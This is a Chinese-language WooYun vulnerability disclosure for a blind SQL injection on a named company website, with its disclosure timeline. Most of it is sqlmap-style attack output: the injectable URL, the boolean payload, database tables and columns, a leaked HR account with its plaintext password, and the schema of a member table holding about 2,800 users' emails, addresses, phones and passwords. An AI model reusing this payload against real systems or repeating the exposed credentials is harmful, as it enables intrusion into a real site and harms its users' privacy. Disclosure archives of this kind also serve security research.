乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-12-21: 积极联系厂商并且等待厂商认领中,细节不对外公开 2016-02-01: 厂商已经主动忽略漏洞,细节向公众公开
注入点:http://www.ccib.com.cn/CHN/About/newsShow.asp?news_id=428数据:
Place: GETParameter: news_id Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: news_id=428 AND 8592=8592---[13:09:56] [INFO] the back-end DBMS is Microsoft Accessweb server operating system: Windows 2003web application technology: ASP.NET, Microsoft IIS 6.0, ASPback-end DBMS: Microsoft Access
Database: Microsoft_Access_masterdb[9 tables]+------------+| admin_user || area || branch || company || exam || guestbook || job || member || news |+------------+
[4 columns]+-----------+-------------+| Column | Type |+-----------+-------------+| news_id | numeric || password | numeric || user_id | numeric || user_name | non-numeric |+-----------+-------------+
测漏一枚hr账户
+---------+----------+---------+-----------+| news_id | password | user_id | user_name |+---------+----------+---------+-----------+| 428 | 888888 | 2 | hr |+---------+----------+---------+-----------+
测漏用户邮箱/地址/密码/性别/电话等等
<code><code>Table: member[8 columns]+-----------+-------------+| Column | Type |+-----------+-------------+| address | non-numeric || email | non-numeric || gender | numeric || loginname | non-numeric || news_id | numeric || passwd | numeric || phone | numeric || question | non-numeric |+-----------+-------------+
将近3000
[14:04:06] [WARNING] running in a single-thread mode. Please consider usaption '--threads' for faster data retrieval[14:04:06] [INFO] retrieved: 2829[14:04:12] [INFO] fetching number of distinct values for column 'email'
未能联系到厂商或者厂商积极拒绝